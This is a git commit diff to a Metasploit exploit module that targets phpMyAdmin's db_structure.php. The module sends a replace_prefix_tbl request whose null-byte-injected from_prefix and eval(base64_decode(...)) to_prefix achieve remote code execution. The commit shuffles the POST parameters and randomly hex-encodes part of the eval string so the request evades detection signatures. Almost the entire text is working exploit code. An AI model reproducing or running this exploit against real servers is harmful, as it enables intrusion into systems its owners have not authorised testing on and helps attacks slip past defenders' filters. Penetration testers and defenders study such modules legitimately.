Add some entropy in request
parent
a043d3b456
commit
c8da13cfa0
|
@ -156,19 +156,29 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
db = rand_text_alpha(3+rand(3))
|
||||
pay = Rex::Text.encode_base64(payload.encoded)
|
||||
evil = "query_type=replace_prefix_tbl"
|
||||
evil << "&db=#{db}"
|
||||
evil << "&selected%5B0%5D=#{db}"
|
||||
evil << "&token=#{token}"
|
||||
evil << "&from_prefix=%2Fe%00"
|
||||
evil << "&to_prefix=eval(base64_decode('#{pay}'))"
|
||||
evil << "&mult_btn=Yes"
|
||||
evil = []
|
||||
evil << "query_type=replace_prefix_tbl"
|
||||
evil << "db=#{db}"
|
||||
evil << "selected%5B0%5D=#{db}"
|
||||
evil << "token=#{token}"
|
||||
evil << "from_prefix=%2Fe%00"
|
||||
evil << "to_prefix=#{Rex::Text.uri_encode('eval(base64_decode(', 'hex-random')}'#{pay}'))"
|
||||
evil << "mult_btn=Yes"
|
||||
|
||||
print_status("Sending exploit payload")
|
||||
data = ""
|
||||
evil.shuffle!
|
||||
0.upto(evil.count-1) do |i|
|
||||
if i == 0
|
||||
data << evil[i]
|
||||
else
|
||||
data << '&' << evil[i]
|
||||
end
|
||||
end
|
||||
|
||||
exploit_result = send_request_raw({
|
||||
'uri' => uri('db_structure.php'),
|
||||
'method' => 'POST',
|
||||
'data' => evil,
|
||||
'data' => data,
|
||||
'cookie' => cookie,
|
||||
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }
|
||||
},2)
|
||||
|
|
Loading…
Reference in New Issue